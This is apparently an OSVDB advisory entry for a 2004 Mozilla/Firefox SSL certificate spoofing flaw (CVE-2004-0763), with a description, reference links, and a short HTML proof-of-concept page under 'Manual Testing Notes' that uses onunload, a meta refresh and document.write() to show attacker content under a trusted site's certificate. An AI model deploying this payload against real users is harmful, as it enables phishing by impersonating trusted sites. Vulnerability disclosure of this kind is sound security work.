Mozilla Browsers onunload SSL Certificate Spoofing

2004-07-26T05:33:55
ID OSVDB:8238
Type osvdb
Reporter OSVDB
Modified 2004-07-26T05:33:55

Description

Vulnerability Description

Mozilla and Mozilla Firefox contains a flaw that may allow a malicious user to spoof SSL certification. The issue is triggered when using "onunload" inside a < body> tag and redirection using http-equiv refresh metatag, document.write() and document.close(), which will spoof a trusted website. By sending a specially crafted webpage, a remote attacker can represent the malicious Web site as that of a trusted site, resulting in a loss of integrity.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

Mozilla and Mozilla Firefox contains a flaw that may allow a malicious user to spoof SSL certification. The issue is triggered when using "onunload" inside a < body> tag and redirection using http-equiv refresh metatag, document.write() and document.close(), which will spoof a trusted website. By sending a specially crafted webpage, a remote attacker can represent the malicious Web site as that of a trusted site, resulting in a loss of integrity.

Manual Testing Notes

< HTML> < HEAD> < TITLE>Spoofer< /TITLE> < META HTTP-EQUIV="REFRESH" CONTENT="0;URL=https://www.example.com"> < /HEAD> < BODY onunload=" document.close(); document.writeln('< body onload=document.close();break;> < h3>It is Great to Use Example's Cert!');

document.close(); window.location.reload(); "> < /body>

References:

Vendor URL: http://www.mozilla.com Vendor Specific Advisory URL Vendor Specific Advisory URL Secunia Advisory ID:12160 Secunia Advisory ID:15432 Secunia Advisory ID:17645 Other Advisory URL: http://www.securiteam.com/securitynews/5EP0L1PDFG.html Other Advisory URL: http://www.cipher.org.uk/index.php?p=advisories/Certificate_Spoofing_Mozilla_FireFox_25-07-2004.advisory Other Advisory URL: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.25/SCOSA-2005.25.txt Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2004-07/1041.html Keyword: SCOSA-2005.49 ISS X-Force ID: 16796 CVE-2004-0763 Bugtraq ID: 10248